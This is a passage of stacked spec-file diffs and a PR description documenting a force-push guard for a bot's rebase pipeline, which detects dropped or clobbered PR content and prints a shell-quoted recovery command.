+  `build_alert()` callout at the top of the rebase PR comment, always naming the
+  full pre-rebase head SHA and the actual push remote so the previous state is
+  recoverable with the printed command. The guard **detects and warns; it never
+  blocks**: it runs best-effort after the push, degrades silently on its own
+  errors, and never fails the mission (design agreed with the humans on incident
+  review: recoverability + loud detection, not a new hard gate). Origin: confirmed
+  incidents where a bot rebase force-push dropped content from the original PR
+  (cpanel-plugins PR #2771 discussion).
 - **Self-heal precedes stash.** An interrupted merge/rebase/cherry-pick/revert
   (or bare unmerged paths / stale `index.lock`) is auto-aborted before stashing,
   because git cannot stash a conflicted tree and the next step resets to the

--- a/specs/components/git-github.md
+++ b/specs/components/git-github.md
@@ -35,7 +35,7 @@ workflows.
 | `claude_step.py::run_ci_fix_loop()` | Shared CI-fix loop; `use_polling` toggles polling vs single-shot recheck; caller supplies `prompt_builder`. |
 | `claude_step.py::_rebase_onto_target()` | Strict PR rebase: target is **only** `{base_remote}/{base}` (the remote matching the PR's base repo, resolved by `rebase_pr._find_remote_for_repo`); fails closed when no remote matches or the target fetch fails; always a plain `git rebase` (never `--onto`); post-rebase sanity gate before any push. Structured failure codes via `result_meta` (`no_base_remote` / `fetch_failed` / `rebase_failed` / `sanity_check_failed`). |
 | `claude_step.py::_verify_rebase_result()` | Post-rebase gate: branch must sit on the target's current tip and its unique-commit count (`rev-list --count target..HEAD`) must not grow vs the pre-rebase baseline. On violation the branch is hard-reset to its pre-rebase commit and the rebase reported failed — nothing is pushed. |
-| `force_push_guard.py` | Post-force-push content-preservation harness for the rebase pipeline. `observe_remote_head()` snapshots the remote branch tip (and fetches its objects) immediately before **every** pipeline push (main push and private-gate re-pushes — the gate feeds its observations back via `push_state`); `verify_content_preserved()` compares the pre-rebase PR head against the **last successfully pushed SHA** (never bare local HEAD): `git cherry` patch-id screening refined by content-level cross-checks (byte-identical files at both heads, verbatim survival of added lines — so upstream squash-merges and context-line drift count as preserved), a file-level dropped-changes check, clobbered mid-pipeline pushes, and a post-push `ls-remote` race check. Per-commit analysis is capped (`_MAX_ANALYZED`) with the cap reported, never silent. `build_push_warning()` renders the findings as one amber/red `build_alert()` callout with the recoverable pre-rebase SHA (full SHA, actual push remote). Best-effort by contract: any internal failure degrades to "no findings" and never blocks a push or fails the mission. |
+| `force_push_guard.py` | Post-force-push content-preservation harness for the rebase pipeline. `observe_remote_head()` snapshots the remote branch tip (and fetches its objects) immediately before **every** pipeline push (main push and private-gate re-pushes — the gate feeds its observations back via `push_state`) and again on a `--force-with-lease` rejection, so the tip the plain `--force` fallback clobbers is still nameable; `verify_content_preserved()` compares the pre-rebase PR head against the **required last successfully pushed SHA** (never bare local HEAD; absent ⇒ guard skipped): `git cherry` patch-id screening plus a separate `rev-list --merges` pass for merge commits (invisible to `cherry`, dropped by a plain rebase — screened through their `--cc` combined diff), each refined by content-level cross-checks (byte-identical files at both heads, or an old→pushed diff that removes none of the commit's added lines — so upstream squash-merges and context-line drift count as preserved, while identical text elsewhere in a file cannot mask a revert), a file-level dropped-changes check, clobbered mid-pipeline pushes, and a post-push `ls-remote` race check. Anything unverifiable (git failure, deletion-only commit) is reported, never cleared. Per-commit analysis is capped (`_MAX_ANALYZED`) with the cap reported, never silent. `build_push_warning()` renders the findings as one amber/red `build_alert()` callout with the recoverable pre-rebase SHA (full SHA, actual push remote) and a shell-quoted, SHA-derived recovery command carrying no PR-controlled text. Best-effort by contract: any internal failure degrades to "no findings" and never blocks a push or fails the mission. |
 | `head_tracker.py` | Detects remote HEAD change (master→main), throttled 12h, state in `.head-tracker.json`. |
 | `github_url_parser.py` | Single PR/issue URL parsing path. |
 | `git_prep.py::prepare_project_branch()` | Pre-mission: fetch → **self-heal interrupted merge/rebase** → stash → checkout base → ff-only/reset to `<remote>/<base>`. Non-fatal; returns `PrepResult`. |
@@ -65,17 +65,40 @@ workflows.
   change present on the pre-rebase PR head survived. "Survived" is judged at the
   content level, not by patch-id alone: a commit with no patch-id equivalent still
   counts as preserved when its files are byte-identical at both heads (upstream
-  squash-merge) or every line it added exists verbatim at the pushed head
-  (context-line drift on a clean rebase) — patch-id misses that fail both checks
-  are what gets reported. The guard also verifies that no commits pushed by others
-  mid-pipeline were clobbered (each push is preceded by an `ls-remote` + fetch
-  observation, including the private gate's re-pushes), and that the remote still
-  points at the last SHA Kōan actually pushed (post-push `ls-remote` final check
-  against the recorded pushed SHA, never bare local HEAD — the race window Kōan
-  cannot close, only detect). Any finding is surfaced as a single amber/red
+  squash-merge) or when the old→pushed diff does not *remove* any line it added
+  (context-line drift on a clean rebase). The comparison is against the removed
+  side of that diff, never a "does this text exist somewhere at the pushed head"
+  lookup — identical text elsewhere in the same file must never mask a reverted
+  change. **Merge commits are screened separately**: `git cherry` never emits
+  them and a plain rebase replays only first-parent commits, so any
+  conflict-resolution content unique to a merge would vanish unseen; each merge
+  of the pre-rebase range is checked through its combined diff (`--cc`), which by
+  construction holds exactly the lines that differ from every parent (a trivial
+  merge yields nothing and is skipped). **The guard never converts its own blind
+  spot into a clean bill of health**: an unreadable file list, an unverifiable
+  commit (deletion-only, binary), or any git failure is reported as unverified
+  content, not silently cleared. The guard also verifies that no commits pushed by
+  others mid-pipeline were clobbered (each push is preceded by an `ls-remote` +
+  fetch observation, including the private gate's re-pushes, **and repeated when
+  `--force-with-lease` is rejected** — the rejection means the remote moved and
+  the plain `--force` fallback is about to overwrite whatever moved it), and that
+  the remote still points at the last SHA Kōan actually pushed (post-push
+  `ls-remote` final check against the recorded pushed SHA, never bare local HEAD —
+  the race window Kōan cannot close, only detect). That pushed SHA is **required**:
+  it is captured before the push and retained only on success, and without it the
+  guard reports itself skipped rather than comparing against a local HEAD that may
+  carry commits the remote never received. Any finding is surfaced as a single amber/red
   `build_alert()` callout at the top of the rebase PR comment, always naming the
   full pre-rebase head SHA and the actual push remote so the previous state is
-  recoverable with the printed command. The guard **detects and warns; it never
+  recoverable with the printed command. That command is **pasted into a human's
+  shell**, so nothing PR-controlled may reach it: ref names legally contain
+  `$()`, backticks, `;` and `&`, so every argument is shell-quoted and the backup
+  branch is derived from the validated SHA, never from the branch name; every
+  attacker-influenced string in the callout (subjects, paths, branch) renders
+  inside a code span it cannot escape. The alert reaches chat through the
+  **un-gated outcome channel** (`notify_outcome`), not the progress notifier — a
+  safety finding must not be invisible in normal messaging mode — and a delivery
+  failure is logged, never swallowed. The guard **detects and warns; it never
   blocks**: it runs best-effort after the push, degrades silently on its own
   errors, and never fails the mission (design agreed with the humans on incident
   review: recoverability + loud detection, not a new hard gate). Origin: confirmed

--- a/specs/components/git-github.md
+++ b/specs/components/git-github.md
@@ -112,7 +112,11 @@ workflows.
   boundary — `rebase_pr._run_force_push_guard()` catches every exception, logs
   it, appends a "guard skipped" action and returns "", so an unexpected guard
   bug can never report a completed rebase as a failed mission or skip the PR
-  comment and CI enqueue that follow it. Origin: confirmed
+  comment and CI enqueue that follow it. The same holds for the guard code that
+  runs on the **live push path** (the pre-push observation, and the
+  re-observation the lease-failure hook triggers): it is wrapped where it is
+  called, so a guard failure degrades to `observation_failed` — never to a push
+  that does not happen, or one diverted to a fallback remote. Origin: confirmed
   incidents where a bot rebase force-push dropped content from the original PR
   (cpanel-plugins PR #2771 discussion).
 - **Self-heal precedes stash.** An interrupted merge/rebase/cherry-pick/revert

--- a/specs/components/git-github.md
+++ b/specs/components/git-github.md
@@ -35,7 +35,7 @@ workflows.
 | `claude_step.py::run_ci_fix_loop()` | Shared CI-fix loop; `use_polling` toggles polling vs single-shot recheck; caller supplies `prompt_builder`. |
 | `claude_step.py::_rebase_onto_target()` | Strict PR rebase: target is **only** `{base_remote}/{base}` (the remote matching the PR's base repo, resolved by `rebase_pr._find_remote_for_repo`); fails closed when no remote matches or the target fetch fails; always a plain `git rebase` (never `--onto`); post-rebase sanity gate before any push. Structured failure codes via `result_meta` (`no_base_remote` / `fetch_failed` / `rebase_failed` / `sanity_check_failed`). |
 | `claude_step.py::_verify_rebase_result()` | Post-rebase gate: branch must sit on the target's current tip and its unique-commit count (`rev-list --count target..HEAD`) must not grow vs the pre-rebase baseline. On violation the branch is hard-reset to its pre-rebase commit and the rebase reported failed — nothing is pushed. |
-| `force_push_guard.py` | Post-force-push content-preservation harness for the rebase pipeline. `observe_remote_head()` snapshots the remote branch tip (and fetches its objects) immediately before **every** pipeline push (main push and private-gate re-pushes — the gate feeds its observations back via `push_state`) and again on a `--force-with-lease` rejection, so the tip the plain `--force` fallback clobbers is still nameable; `verify_content_preserved()` compares the pre-rebase PR head against the **required last successfully pushed SHA** (never bare local HEAD; absent ⇒ guard skipped): `git cherry` patch-id screening plus a separate `rev-list --merges` pass for merge commits (invisible to `cherry`, dropped by a plain rebase — screened through their `--cc` combined diff), each refined by content-level cross-checks (byte-identical files at both heads, or an old→pushed diff that removes none of the commit's added lines — so upstream squash-merges and context-line drift count as preserved, while identical text elsewhere in a file cannot mask a revert), a file-level dropped-changes check, clobbered mid-pipeline pushes, and a post-push `ls-remote` race check. Anything unverifiable (git failure, deletion-only commit) is reported, never cleared. Per-commit analysis is capped (`_MAX_ANALYZED`) with the cap reported, never silent. `build_push_warning()` renders the findings as one amber/red `build_alert()` callout with the recoverable pre-rebase SHA (full SHA, actual push remote) and a shell-quoted, SHA-derived recovery command carrying no PR-controlled text. Best-effort by contract: any internal failure degrades to "no findings" and never blocks a push or fails the mission. |
+| `force_push_guard.py` | Post-force-push content-preservation harness for the rebase pipeline. `observe_remote_head()` snapshots the remote branch tip (and fetches its objects) immediately before **every** pipeline push (main push and private-gate re-pushes — the gate feeds its observations back via `push_state`) and again on a `--force-with-lease` rejection, so the tip the plain `--force` fallback clobbers is still nameable; it returns `None` (not `""`) when the lookup itself failed, so "could not look" stays distinguishable from "nothing was there" and surfaces as an unverified check; observations are scoped to the remote whose push succeeded; `verify_content_preserved()` compares the pre-rebase PR head against the **required last successfully pushed SHA** (never bare local HEAD; absent ⇒ guard skipped): `git cherry` patch-id screening plus a separate `rev-list --merges` pass for merge commits (invisible to `cherry`, dropped by a plain rebase — screened through their `--cc` combined diff), each refined by content-level cross-checks (byte-identical files at both heads, or an old→pushed diff that removes none of the commit's added lines — so upstream squash-merges and context-line drift count as preserved, while identical text elsewhere in a file cannot mask a revert), a file-level dropped-changes check, clobbered mid-pipeline pushes, and a post-push `ls-remote` race check. Anything unverifiable (git failure, deletion-only commit) is reported, never cleared. Per-commit analysis is capped (`_MAX_ANALYZED`) with the cap reported, never silent. `build_push_warning()` renders the findings as one amber/red `build_alert()` callout with the recoverable pre-rebase SHA (full SHA, actual push remote) and a shell-quoted, SHA-derived recovery command carrying no PR-controlled text. Best-effort by contract: any internal failure degrades to "no findings" and never blocks a push or fails the mission. |
 | `head_tracker.py` | Detects remote HEAD change (master→main), throttled 12h, state in `.head-tracker.json`. |
 | `github_url_parser.py` | Single PR/issue URL parsing path. |
 | `git_prep.py::prepare_project_branch()` | Pre-mission: fetch → **self-heal interrupted merge/rebase** → stash → checkout base → ff-only/reset to `<remote>/<base>`. Non-fatal; returns `PrepResult`. |
@@ -81,7 +81,13 @@ workflows.
   others mid-pipeline were clobbered (each push is preceded by an `ls-remote` +
   fetch observation, including the private gate's re-pushes, **and repeated when
   `--force-with-lease` is rejected** — the rejection means the remote moved and
-  the plain `--force` fallback is about to overwrite whatever moved it), and that
+  the plain `--force` fallback is about to overwrite whatever moved it).
+  Observations are **scoped to the remote actually pushed to**: `_push_with_fallback`
+  tries several remotes, and a tip observed on one whose push then failed was
+  never overwritten — feeding it to the clobber check would raise a red alert
+  over commits that are still there. A check that could not run (either
+  `ls-remote`, an unreadable commit) is reported as an **unverified check** in the
+  alert, never folded into the clean case. It also verifies that
   the remote still points at the last SHA Kōan actually pushed (post-push
   `ls-remote` final check against the recorded pushed SHA, never bare local HEAD —
   the race window Kōan cannot close, only detect). That pushed SHA is **required**:
@@ -99,9 +105,14 @@ workflows.
   **un-gated outcome channel** (`notify_outcome`), not the progress notifier — a
   safety finding must not be invisible in normal messaging mode — and a delivery
   failure is logged, never swallowed. The guard **detects and warns; it never
-  blocks**: it runs best-effort after the push, degrades silently on its own
-  errors, and never fails the mission (design agreed with the humans on incident
-  review: recoverability + loud detection, not a new hard gate). Origin: confirmed
+  blocks**: it runs best-effort after the push, degrades on its own errors, and
+  never fails the mission (design agreed with the humans on incident review:
+  recoverability + loud detection, not a new hard gate). Because it runs *after*
+  the branch has been rewritten, the entire guard call site is inside that
+  boundary — `rebase_pr._run_force_push_guard()` catches every exception, logs
+  it, appends a "guard skipped" action and returns "", so an unexpected guard
+  bug can never report a completed rebase as a failed mission or skip the PR
+  comment and CI enqueue that follow it. Origin: confirmed
   incidents where a bot rebase force-push dropped content from the original PR
   (cpanel-plugins PR #2771 discussion).
 - **Self-heal precedes stash.** An interrupted merge/rebase/cherry-pick/revert

--- a/specs/skills/rebase.md
+++ b/specs/skills/rebase.md
@@ -89,13 +89,17 @@ See `docs/users/skills.md` for the end-user `/rebase` reference and
   after the pipeline's last push (private-gate re-pushes included — the gate
   feeds its own pre-push observations and pushed SHA back into the guard's
   `push_state`), is best-effort (its own failure never fails the rebase), and
-  reports via the PR comment + `notify_fn` — it never blocks or reverts a
-  push. Detection scope: dropped/modified original PR content (patch-id
-  screening refined by content-level survival checks, so upstream
-  squash-merges and context-line drift never warn), clobbered mid-pipeline
-  pushes by others, and a post-push remote mismatch against the recorded
-  pushed SHA (race). The warning always includes the full pre-rebase head SHA
-  and a recovery command targeting the actual push remote.
+  reports via the PR comment + the un-gated outcome channel (`notify_outcome`,
+  so the finding is not swallowed by normal messaging mode) — it never blocks
+  or reverts a push. Detection scope: dropped/modified original PR content
+  (patch-id screening plus a separate merge-commit pass, refined by
+  content-level survival checks, so upstream squash-merges and context-line
+  drift never warn), clobbered mid-pipeline pushes by others (including a tip
+  that only surfaces when `--force-with-lease` is rejected), and a post-push
+  remote mismatch against the recorded pushed SHA (race). Without a confirmed
+  pushed SHA the guard skips rather than comparing against local HEAD. The
+  warning always includes the full pre-rebase head SHA and a shell-quoted
+  recovery command targeting the actual push remote.
 
 ## Transition (temporary)
 

--- a/specs/skills/rebase.md
+++ b/specs/skills/rebase.md
@@ -88,8 +88,10 @@ See `docs/users/skills.md` for the end-user `/rebase` reference and
 - **Force pushes are guarded, not gated.** The content-preservation guard runs
   after the pipeline's last push (private-gate re-pushes included — the gate
   feeds its own pre-push observations and pushed SHA back into the guard's
-  `push_state`), is best-effort — the whole call site is wrapped, so not even
-  an unexpected guard bug can fail a rebase whose push already landed — and
+  `push_state`), is best-effort — both the whole post-push call site and the
+  pre-push observations are wrapped, so not even an unexpected guard bug can
+  fail a rebase whose push already landed, nor stop or divert the push it only
+  observes — and
   reports via the PR comment + the un-gated outcome channel (`notify_outcome`,
   so the finding is not swallowed by normal messaging mode) — it never blocks
   or reverts a push. Detection scope: dropped/modified original PR content

--- a/specs/skills/rebase.md
+++ b/specs/skills/rebase.md
@@ -86,12 +86,16 @@ See `docs/users/skills.md` for the end-user `/rebase` reference and
   (600 seconds by default); exhaustion aborts the rebase and preserves the
   existing recreate fallback.
 - **Force pushes are guarded, not gated.** The content-preservation guard runs
-  after every successful rebase push, is best-effort (its own failure never
-  fails the rebase), and reports via the PR comment + `notify_fn` — it never
-  blocks or reverts a push. Detection scope: dropped/modified original PR
-  content (patch-id + file-level), clobbered mid-rebase pushes by others, and
-  a post-push remote mismatch (race). The warning always includes the
-  pre-rebase head SHA for recovery.
+  after the pipeline's last push (private-gate re-pushes included — the gate
+  feeds its own pre-push observations and pushed SHA back into the guard's
+  `push_state`), is best-effort (its own failure never fails the rebase), and
+  reports via the PR comment + `notify_fn` — it never blocks or reverts a
+  push. Detection scope: dropped/modified original PR content (patch-id
+  screening refined by content-level survival checks, so upstream
+  squash-merges and context-line drift never warn), clobbered mid-pipeline
+  pushes by others, and a post-push remote mismatch against the recorded
+  pushed SHA (race). The warning always includes the full pre-rebase head SHA
+  and a recovery command targeting the actual push remote.
 
 ## Transition (temporary)
 

--- a/specs/skills/rebase.md
+++ b/specs/skills/rebase.md
@@ -88,16 +88,20 @@ See `docs/users/skills.md` for the end-user `/rebase` reference and
 - **Force pushes are guarded, not gated.** The content-preservation guard runs
   after the pipeline's last push (private-gate re-pushes included — the gate
   feeds its own pre-push observations and pushed SHA back into the guard's
-  `push_state`), is best-effort (its own failure never fails the rebase), and
+  `push_state`), is best-effort — the whole call site is wrapped, so not even
+  an unexpected guard bug can fail a rebase whose push already landed — and
   reports via the PR comment + the un-gated outcome channel (`notify_outcome`,
   so the finding is not swallowed by normal messaging mode) — it never blocks
   or reverts a push. Detection scope: dropped/modified original PR content
   (patch-id screening plus a separate merge-commit pass, refined by
   content-level survival checks, so upstream squash-merges and context-line
   drift never warn), clobbered mid-pipeline pushes by others (including a tip
-  that only surfaces when `--force-with-lease` is rejected), and a post-push
-  remote mismatch against the recorded pushed SHA (race). Without a confirmed
-  pushed SHA the guard skips rather than comparing against local HEAD. The
+  that only surfaces when `--force-with-lease` is rejected; observations of a
+  remote whose push then failed are discarded, since that branch was never
+  overwritten), and a post-push remote mismatch against the recorded pushed
+  SHA (race). Without a confirmed pushed SHA the guard skips rather than
+  comparing against local HEAD, and any check that could not run is listed as
+  unverified instead of passing silently. The
   warning always includes the full pre-rebase head SHA and a shell-quoted
   recovery command targeting the actual push remote.
 

--- a/specs/skills/rebase.md
+++ b/specs/skills/rebase.md
@@ -4,7 +4,7 @@ title: "Skill Spec — rebase"
 description: "Documents the `/rebase` skill that rebases a PR onto its current base by default and, with `--fix` (or any trailing context), also addresses review feedback, including its already-solved detection JSON scored by the eval harness."
 tags: [skill]
 created: 2026-06-27
-updated: 2026-07-22
+updated: 2026-08-14
 ---
 
 # Skill Spec — `rebase`
@@ -45,6 +45,11 @@ See `docs/users/skills.md` for the end-user `/rebase` reference and
 
 - Queues a rebase mission (`model_key: mission`); runs via `rebase_pr.py`.
 - Updates the PR branch (force-push with multi-account token resolution if needed).
+- After the pipeline's final push, the force-push content-preservation guard
+  (`force_push_guard.py`, see `specs/components/git-github.md`) compares the
+  pre-rebase PR head against what was pushed; if original PR content was dropped
+  or modified, or a concurrent push was clobbered/raced, the PR comment opens
+  with one CAUTION/WARNING callout naming the recoverable pre-rebase SHA.
 - Commit messages shaped by `commit_conventions.py`.
 
 ## Error cases
@@ -80,6 +85,13 @@ See `docs/users/skills.md` for the end-user `/rebase` reference and
   before continuing. Its per-round agent budget is `rebase_conflict_timeout`
   (600 seconds by default); exhaustion aborts the rebase and preserves the
   existing recreate fallback.
+- **Force pushes are guarded, not gated.** The content-preservation guard runs
+  after every successful rebase push, is best-effort (its own failure never
+  fails the rebase), and reports via the PR comment + `notify_fn` — it never
+  blocks or reverts a push. Detection scope: dropped/modified original PR
+  content (patch-id + file-level), clobbered mid-rebase pushes by others, and
+  a post-push remote mismatch (race). The warning always includes the
+  pre-rebase head SHA for recovery.
 
 ## Transition (temporary)
 


### PR DESCRIPTION
Adds a post-push guard that detects when a rebase force-push drops or clobbers content, and surfaces an amber/red alert naming the pre-rebase head SHA.
- Includes adversarial-review hardening and CI-fix-window coverage.

- [x] **Architectural change:** Yes — modifies `specs/components/git-github.md` (landed contract-first alongside the code).
